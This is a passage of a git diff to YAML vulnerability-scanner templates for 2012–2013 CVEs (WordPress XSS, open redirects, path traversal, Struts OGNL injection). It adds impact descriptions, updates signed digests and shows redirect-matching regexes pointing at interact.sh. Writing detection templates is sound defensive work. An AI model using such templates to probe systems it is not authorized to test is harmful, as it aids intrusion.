sensitive information or unauthorized actions. remediation: | Update to the latest version of the WP-FaceThumb plugin (0.2 or higher) which includes proper input sanitization to mitigate the XSS vulnerability. reference: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a00463044022063cfe684e3680f38834aabb4ac32554f36bef83e45c12814aa5ade55a1272459022011d7b1c446e22aa799cb493ecb96aaecf4818e8e331da50d0fb797e006fe2277:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100a451cb95840a08bc92aa3efac38d881cee6f1a25ce47babc654cd59cf8f2a338022100a60670a33e8bd6a0f7155deb1dfd658da441f4dc06d86f733814fa246002afca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-3153.yaml b/http/cves/2012/CVE-2012-3153.yaml index 34e75c4b6d..ede1122189 100644 --- a/http/cves/2012/CVE-2012-3153.yaml +++ b/http/cves/2012/CVE-2012-3153.yaml @@ -8,6 +8,8 @@ info: An unspecified vulnerability in the Oracle Reports Developer component in Oracle Fusion Middleware 11.1.1.4, 11.1.1.6, and 11.1.2.0 allows remote attackers to affect confidentiality and integrity via unknown vectors related to Report Server Component. + impact: | + Successful exploitation of this vulnerability can lead to unauthorized remote code execution. remediation: | Apply the necessary patches and updates provided by Oracle to mitigate this vulnerability. reference: @@ -62,4 +64,4 @@ http: name: linux_working_path regex: - "/.*/showenv" -# digest: 4a0a00473045022100b8455ac21b80a5260e1793e9cd76e78f23f7891f4024746380341e9f77786b7f02201e2ac88f61fa054ab3b8287ef4e92b6cd3aaa054160aa535ffbc2d8485c82dea:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206b20c1c55c81fef4dbaafa5d763e6e0080cf0589adcb5fd8ac1bb0d510083d8f022100a140c60aaa3a69d82b3f11e6534dfd0000323e2250e822e9bbe7080ce6e3836e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4032.yaml b/http/cves/2012/CVE-2012-4032.yaml index f89fda1509..47ed6cfce5 100644 --- a/http/cves/2012/CVE-2012-4032.yaml +++ b/http/cves/2012/CVE-2012-4032.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in the login page in WebsitePanel before 1.2.2.1 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in ReturnUrl to Default.aspx + impact: | + An attacker can trick users into visiting a malicious website, leading to potential phishing attacks or further exploitation. remediation: | Upgrade to WebsitePanel v1.2.2.1 or later to fix the open redirect vulnerability. reference: @@ -45,4 +47,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:http?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a00473045022100edca48fca1d5ab382b01db278a7d30d607a192c0c8a9dbdf103032ecf95f22c502205529150fb4d78cc7a24825f86b84353e0794cad6391d2d70138c160fa5d83bb4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207602543f3bacfca903cf1afb4e30bb166b97caff3605c1cba10cfb3666d79e58022003987bc8f66668eed9e95e4de6bbc0e4ff9b51bb7e87d79d4c124dff966d1d93:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4242.yaml b/http/cves/2012/CVE-2012-4242.yaml index 21c38d55cc..61b4fd7c1e 100644 --- a/http/cves/2012/CVE-2012-4242.yaml +++ b/http/cves/2012/CVE-2012-4242.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Plugin MF Gig Calendar to mitigate this vulnerability. reference: @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022075906cf3f171030df9198bf0fb45042aa8467d3fc7734a3933db9dbaf2006b6e022100c75f42a3f048659ca7c3796f6d82dc4c26b97c8cdf61e65b3e35071de4cd7db0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100d7aa854fa8a07369a25a7f77bdcda2a48c326d87c20b7de041758b4b78e8223d022071ce9f6abcf3c42eebfa1ebc2b4f4ab8d1a07c58afcbead343d3ead480a788f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4253.yaml b/http/cves/2012/CVE-2012-4253.yaml index d8b2940019..2a497a6055 100644 --- a/http/cves/2012/CVE-2012-4253.yaml +++ b/http/cves/2012/CVE-2012-4253.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php. + impact: | + An attacker can read sensitive files on the server, potentially leading to unauthorized access or information disclosure. remediation: | Upgrade to a patched version of MySQLDumper or apply the necessary security patches to fix the directory traversal vulnerability. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206c3037d540cff87adad1e2e7a04f9c875592d8f89b5410fe75fc56a5637af5930221009f476973797ebf91ad697c84cdf2a9cf0231aecf46ce97d00dc02fa6842231b6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100af14a5dea698b34ecef70e5a08fb8d0ae4606149ac6ef546f9d4048d328607c1022042569e46d6fc5bc6349128f8650d8422bb936d441378285d4421181a63911748:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4273.yaml b/http/cves/2012/CVE-2012-4273.yaml index fc6c5bb6c8..284cd0a85b 100644 --- a/http/cves/2012/CVE-2012-4273.yaml +++ b/http/cves/2012/CVE-2012-4273.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter. + impact: | + Allows attackers to inject malicious scripts into web pages viewed by users, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the 2 Click Socialmedia Buttons plugin (0.34 or higher) to fix the XSS vulnerability. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100f6ed68b186aa2b1a011a6a2dd63793a763d5699387fc7be306baa316b670d3d80220275179eb839f24558b6bc7dffa6cafde837f0198722d08eb23e263bc7a9d5d3d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f895979c53a8a44c41029e255e3e6cca5f42d448ffc075e1ba0c63c0e029a53022016f1b9899f89a74da727b77ab77517a86e107c48714b6eb5b5c531f8fa6d938c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4547.yaml b/http/cves/2012/CVE-2012-4547.yaml index e4884ff4ab..720cccde78 100644 --- a/http/cves/2012/CVE-2012-4547.yaml +++ b/http/cves/2012/CVE-2012-4547.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: AWStats is prone to multiple cross-site scripting vulnerabilities because the application fails to properly sanitize user-supplied input. + impact: | + Allows remote attackers to inject arbitrary web script or HTML via the 'url' parameter. reference: - https://www.exploit-db.com/exploits/36164 - https://nvd.nist.gov/vuln/detail/CVE-2012-4547 @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022041260fd2e8a49bd7918ca992439833bef1808d32c54a50a302dd26b9828138150221008d045f606bc52beb9fcba1961134340b355b3f0815f7b27872d73c0ed920d661:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402202a0794bed7e96c74b5c23e1a33771b5515251a4a11a3bdbf1bbef57faa66dc66022039605f685e93431029581e46a0793016be45d5f85c4c2d2e3a8df4ff8c2d1e4a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4768.yaml b/http/cves/2012/CVE-2012-4768.yaml index 169c94dd2e..b72890168b 100644 --- a/http/cves/2012/CVE-2012-4768.yaml +++ b/http/cves/2012/CVE-2012-4768.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of Download Monitor (3.3.5.9 or higher) or apply the official patch provided by the plugin developer. reference: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100af51ca112118b69ebacf7878456fe9838392b6b42ce845f319f3a6c4f7fa3717022100a9cddb89069ab0f11d196052337b34f39043edac9d9a3d6b7dc03853de70d6f3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100ebbe7f5db516dfb9e8d1f9cd08375491e27f7e7a86770cc1fe7315b25d62c95a022100901ba23913216d153ef95886eca13be0f5f29b5d414b8cc55cc303149d624e81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4878.yaml b/http/cves/2012/CVE-2012-4878.yaml index 2ca898b185..469e05ae91 100644 --- a/http/cves/2012/CVE-2012-4878.yaml +++ b/http/cves/2012/CVE-2012-4878.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action. + impact: | + An attacker can read or modify sensitive files on the server, potentially leading to unauthorized accessand data leakage. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in FlatnuX CMS. reference: @@ -41,4 +43,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d6ab06348554d3e6c050a9e5256169b20d1c7ede5538404fdbfbd439984f57f60220188679716e64ea25f878d495940cbd4dd7b3098f7e747d533792a5e9ac515912:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce5195819e7865cf1103c9bc43bfb499880a1ddc9fac36f8df36fe36f8f0f96602204c4af856a0ec4128e55a6da648ca13aafb5d73e0771e886e5a811745dd4a129e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4889.yaml b/http/cves/2012/CVE-2012-4889.yaml index f9ca85bfc3..739c473901 100644 --- a/http/cves/2012/CVE-2012-4889.yaml +++ b/http/cves/2012/CVE-2012-4889.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do. + impact: | + Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected user's browser. remediation: | Apply the latest security patch or upgrade to a newer version of ManageEngine Firewall Analyzer. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502202c69534a578527559e10b44c7367e0d2757f5579dee33fa91a1b98986693f72d022100e9f694dc24caa3b01abdb83691acbc79caa01d3f2230fed54e139de676856957:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c6c35145fdfc7038b7cf7d21ab7bd2c23207b7b050865d00c256ebd58edf58fa022100a82057de268fce4de55702b67c8f3f09a548ebd9dd9fd06dba78cdecc367f033:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4940.yaml b/http/cves/2012/CVE-2012-4940.yaml index 15ce4fe468..86f4edfdf3 100644 --- a/http/cves/2012/CVE-2012-4940.yaml +++ b/http/cves/2012/CVE-2012-4940.yaml @@ -5,6 +5,8 @@ info: author: dhiyaneshDk severity: medium description: Multiple directory traversal vulnerabilities in the View Log Files component in Axigen Free Mail Server allow remote attackers to read or delete arbitrary files via a .. (dot dot) in the fileName parameter in a download action to source/loggin/page_log_dwn_file.hsp, or the fileName parameter in an edit or delete action to the default URI. + impact: | + An attacker can read sensitive files, potentially leading to unauthorized access, data leakage, or further compromise of the server. remediation: | Apply the latest security patches or updates provided by the vendor to fix the directory traversal vulnerability in Axigen Mail Server. reference: @@ -40,4 +42,4 @@ http: - "fonts" - "extensions" condition: and -# digest: 4b0a00483046022100eec0f93ad04a73deecae7c993ae01e9d0a57efed806fc8ec1bc3f11499953a5c022100b5193a6e7eef2f7918ab4463bcdc76b1719ec271ebaffe0c69c159110ea51ecf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bcb93a85e762a81c4ca7d98ce6b0fe3528962dce21efe81c1e1ee9ba9388b97302207f5783d3f27ff48af2191ffa4aa33643b3c3454f70003c551532af70f9344b2f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-4982.yaml b/http/cves/2012/CVE-2012-4982.yaml index 49376f9938..a1cf16545b 100644 --- a/http/cves/2012/CVE-2012-4982.yaml +++ b/http/cves/2012/CVE-2012-4982.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in assets/login on the Forescout CounterACT NAC device before 7.0 allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the 'a' parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: | Apply the latest security patches or upgrade to a newer version of Forescout CounterACT to fix the open redirect vulnerability. reference: @@ -37,4 +39,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a00473045022100f019b8be4db54c3d3c58c66926a558b1ac0f2e2717bacd47a43c1844032730fc022063c579e3b48f7b2260a6aafb9a099562216185a74e99f86c0f3d136c39e4872f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450221009b89a5eb4db723062b612d59daf2a4427a34860705309b3a8ccef0462629664102200aa9e5ac13539f5546a57a93e60a5bfbfb603ecdd27231e5ee4761989aeb6e5c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5321.yaml b/http/cves/2012/CVE-2012-5321.yaml index de0a00b29a..e4cddf5f53 100644 --- a/http/cves/2012/CVE-2012-5321.yaml +++ b/http/cves/2012/CVE-2012-5321.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | tiki-featured_link.php in TikiWiki CMS/Groupware 8.3 allows remote attackers to load arbitrary web site pages into frames and conduct phishing attacks via the url parameter, aka "frame injection + impact: | + Successful exploitation of this vulnerability could lead to phishing attacks and potential unauthorized access to sensitive information. remediation: | Apply the latest security patches or upgrade to a newer version of TikiWiki CMS Groupware to mitigate the risk of open redirect vulnerabilities. reference: @@ -38,4 +40,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 4a0a004730450220657fdf02e215924c85fc640d3e15d642d3c3bfc51694397204305a289fab9060022100c7be87d2209034849c0a71b7b246be89ad42ee252e85954efd3f4e334de0c8a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a004730450220474532ff614e3a938698419dd51826c9c2d641e33b47fe7f5d14ba903b3ad2bd022100d8e84f66303b745268bb2bbb7a786f1dd37d0c5c8d44583efee33c3b777046a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-5913.yaml b/http/cves/2012/CVE-2012-5913.yaml index 421dee850e..2b9e972953 100644 --- a/http/cves/2012/CVE-2012-5913.yaml +++ b/http/cves/2012/CVE-2012-5913.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions. remediation: | Update the WordPress Integrator plugin to the latest version or apply the vendor-supplied patch to mitigate this vulnerability. reference: @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100adee9e7dcaf769a8748388a8c02e9f47552a1061276d49b5ad582bba335bca94022043ad9ba4ea16dbb58d3e9de9ed5295c802979cb598e387ec93880e41b6bf9f2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402206d1ea36955018c9a5addf005b4ca00aa6fe284b5943dda5d903b7ab128656ded02205f865a67e35c405383882c9ed298b28f63c6252c4a9535e191dddd67a845d74e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2012/CVE-2012-6499.yaml b/http/cves/2012/CVE-2012-6499.yaml index cee1dbee0b..b999245b8f 100644 --- a/http/cves/2012/CVE-2012-6499.yaml +++ b/http/cves/2012/CVE-2012-6499.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open redirect vulnerability in age-verification.php in the Age Verification plugin 0.4 and earlier for WordPress allows remote attackers to redirect users to arbitrary web sites and conduct phishing attacks via a URL in the redirect_to parameter. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Update to the latest version of the WordPress Plugin Age Verification or remove the plugin if not needed. reference: @@ -39,4 +41,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' -# digest: 490a004630440220229780e9caa0b15586da171825a5a0fd25d3308d9a744012f1846ee7b29e9c8302203cf21db6e6ee250ad9e402e7349c9d4ab76ff3a3d72d3f04ce4703ed4c903d7d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100bd8af2517a97063f8f0ad4e7d78cd103cd7d8b32c38589a55980d7328bff66bb0221008316cb7f49de8d01ec1a35a1fd0f9614debd8d666390d579c45273af7cd348fd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-1965.yaml b/http/cves/2013/CVE-2013-1965.yaml index f9e75572c2..0a0ffb53c8 100644 --- a/http/cves/2013/CVE-2013-1965.yaml +++ b/http/cves/2013/CVE-2013-1965.yaml @@ -5,6 +5,8 @@ info: author: pikpikcu severity: critical description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect. + impact: | + Successful exploitation of this vulnerability can lead to remote code execution on the affected server. remediation: Developers should immediately upgrade to Struts 2.3.14.3 or later. reference: - http://struts.apache.org/development/2.x/docs/s2-012.html @@ -44,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100db01b2a5e8b5b55577d1b2ea815494413fa46d15c8d57255721ffc4d3239f753022027caf465cc65eed27f746aae579f2f54c80c2d529b23d738d681f61588e1f30b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a004830460221009903a3e1aa1de4796437c5ec22c7e9fe8f66b6933044675432f04de35069c0c80221009972ae5a17ade6f270b3a89a00754b6b4140d1a8680026e7214026f60f32a517:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2248.yaml b/http/cves/2013/CVE-2013-2248.yaml index e3c21f2f50..1727ea4635 100644 --- a/http/cves/2013/CVE-2013-2248.yaml +++ b/http/cves/2013/CVE-2013-2248.yaml @@ -5,6 +5,8 @@ info: author: 0x_Akoko severity: medium description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input. + impact: | + An attacker can exploit these vulnerabilities to redirect users to malicious websites, leading to phishing attacks or the download of malware. remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - https://www.exploit-db.com/exploits/38666 @@ -36,4 +38,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a004730450221008cf08226ee47f66378563d2531bcf16d1b7d119faad35c013e7fdd53daf919c702205efd24c07542f82a551cdc3e15b5adcb96ecb558b97734366e5f719f08361707:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205f523eda587cec05282805970bcacd0b1d52ab21c3cd109fb57a9b1576a41139022100d62846038f26508c564256caecfc689384db9ca1b9a2c21706077dbed9480472:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2251.yaml b/http/cves/2013/CVE-2013-2251.yaml index 05c339e230..9e8277fe07 100644 --- a/http/cves/2013/CVE-2013-2251.yaml +++ b/http/cves/2013/CVE-2013-2251.yaml @@ -5,6 +5,8 @@ info: author: exploitation,dwisiswant0,alex severity: critical description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:", or "redirectAction:" is not properly sanitized and will be evaluated as an OGNL expression against the value stack. This introduces the possibility to inject server side code. + impact: | + This vulnerability can lead to remote code execution, allowing attackers to take control of the affected system. remediation: Developers should immediately upgrade to Struts 2.3.15.1 or later. reference: - http://struts.apache.org/release/2.3.x/docs/s2-016.html @@ -59,4 +61,4 @@ http: - 200 - 400 condition: or -# digest: 490a0046304402206119e24ee3f7acb2f071a8e0ab4c041ae406be7c9fd6f915b458b55075e71fab02207006377f00a8f6db8838e954c0e8082334259076d6b1fb35b2d6204b9de43dcd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205601fb089b44d0324d4e78d34a355a1a218e71359e2b5cccfec09dc0dac2a830022100b3ba8a79988f901347cb27d7c2fad60577fb0d5d51daa8e7900c2b108584ca81:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2287.yaml b/http/cves/2013/CVE-2013-2287.yaml index cd6b420187..ef4a8e06bc 100644 --- a/http/cves/2013/CVE-2013-2287.yaml +++ b/http/cves/2013/CVE-2013-2287.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: Multiple cross-site scripting vulnerabilities in views/notify.php in the Uploader plugin 1.0.4 for WordPress allow remote attackers to inject arbitrary web script or HTML via the (1) notify or (2) blog parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the affected website, leading to potential data theft, session hijacking, or defacement. remediation: | Update to the latest version of the WordPress Plugin Uploader or apply a patch provided by the vendor to fix the XSS vulnerability. reference: @@ -45,4 +47,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100c8c5559368df444abe62727c1b90f86dd61fc41a85a3649cd579fb795fb172160221008d258e921ba29a6ed61ab268d0ef5889e4635040d37eb6f4bc9f2f5cf2260214:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100df23b384d625e0c6b32964a3d6e3dd96f8a526e7423cfabb76e505554d75e8570221008663e84f3f5b73473b8bd3ec89c06b3b405ddeb7de0acc8e93238ccc461d9203:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-2621.yaml b/http/cves/2013/CVE-2013-2621.yaml index e01b95c4e0..cd0a6e533f 100644 --- a/http/cves/2013/CVE-2013-2621.yaml +++ b/http/cves/2013/CVE-2013-2621.yaml @@ -6,6 +6,8 @@ info: severity: medium description: | Open Redirection Vulnerability in the redir.php script in Telaen before 1.3.1 allows remote attackers to redirect victims to arbitrary websites via a crafted URL. + impact: | + An attacker can exploit this vulnerability to redirect users to malicious websites, leading to phishing attacks or the installation of malware. remediation: | Upgrade to the latest version of Telaen to fix the open redirect vulnerability. reference: @@ -40,4 +42,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh.*$' -# digest: 4a0a004730450220771c3c445edc036b096c72ceb4c3f7ab76e2e3f7179f89c16d3dae9172e55299022100a4671f0a22cda7c3b5e1443a76f3495f12d0798c17c996485db4971135a9b2b0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203356ff6dea12e2b33f72c0ce48ee00c534cd6e83cbe63d8174f9a71aec181166022007bf562e5422db455f87eeedfafd70e8516728a53184efff1ce66c5c8da0abab:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-3526.yaml b/http/cves/2013/CVE-2013-3526.yaml index 00405aae0d..b755c01603 100644 --- a/http/cves/2013/CVE-2013-3526.yaml +++ b/http/cves/2013/CVE-2013-3526.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in js/ta_loaded.js.php in the Traffic Analyzer plugin, possibly 3.3.2 and earlier, for WordPress allows remote attackers to inject arbitrary web script or HTML via the aoid parameter." + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into web pages viewed by users, leading to potential theft of sensitive information or unauthorized actions. remediation: | Upgrade to the latest version to mitigate this vulnerability. reference: @@ -46,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450221008d38745a716f14fcf8be4901d004c88e804dacec165db16ba953d21eaed28a9b0220324b395aa0fafbde5e2926c95fbcffc6c46a35339ceb0bd8f84478d05e97dc0c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206a15e3183061f1b6d48531d10690ab71d1bee82e4634f305ef652f7c1519e9bd022100d0a37a0600fffa5c115e587879a2add388e0aea59727297f4b8f2c8e6e0f48cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4117.yaml b/http/cves/2013/CVE-2013-4117.yaml index 842d119d41..53ebaa578c 100644 --- a/http/cves/2013/CVE-2013-4117.yaml +++ b/http/cves/2013/CVE-2013-4117.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: | Update to the latest version of the WordPress Plugin Category Grid View Gallery or apply the provided patch to fix the XSS vulnerability. reference: @@ -48,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022068800cf5afc60f6f0e1164c51e41eda0bb73e4971bf1af1d2784b7037836ae6f022100e7db26c03f4a1f3b610d0c4702a75ef1e06c4886b069bd80e0e94a15243d31e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d4b3fcbb4906b19001cf72d4aad9add7b544041dd97c0ccf35838cff913a8a6e022100e24d898f72a403c58117f0da9ad80377007fd8687238e628cc2cd9cd792380e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-4625.yaml b/http/cves/2013/CVE-2013-4625.yaml index 3fca69a6a3..dc3fb151c8 100644 --- a/http/cves/2013/CVE-2013-4625.yaml +++ b/http/cves/2013/CVE-2013-4625.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A cross-site scripting vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter. + impact: | + Successful exploitation of this vulnerability could allow an attacker to inject malicious scripts into the target website, potentially leading to session hijacking, defacement, or theft of sensitive information. remediation: Upgrade to Duplicator 0.4.5 or later. reference: - https://nvd.nist.gov/vuln/detail/CVE-2013-4625 @@ -47,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022009fbb02a9a71ecffbb55ff0944e4a4ff387b2f303ce2ee21f6f8b9f98d374bb4022100c0b21c5c731a94ae9a9d71f6944e2d6fd25af70898f217ea5ca0cf43f13c83d8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502205afc0558c0a5c6f4e156350413787049ba55798abafb3a473caf199566a9d3f1022100dc757c0322a69f872070597ce88eee1b95028c408b4666a3df83e0b817802a6c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2013/CVE-2013-5528.yaml b/http/cves/2013/CVE-2013-5528.yaml index 695d7d305b..d60c8c4129 100644 --- a/http/cves/2013/CVE-2013-5528.yaml +++ b/http/cves/2013/CVE-2013-5528.yaml @@ -5,6 +5,8 @@ info: author: daffainfo severity: medium description: A directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815 + impact: | + Successful exploitation of this vulnerability could allow an attacker to access sensitive files and directories on the affected system. remediation: | Apply the necessary security patches or updates provided by Cisco to mitigate this vulnerability. reference: @@ -39,4 +41,4 @@ http: - type: status status: - 200 -# digest: 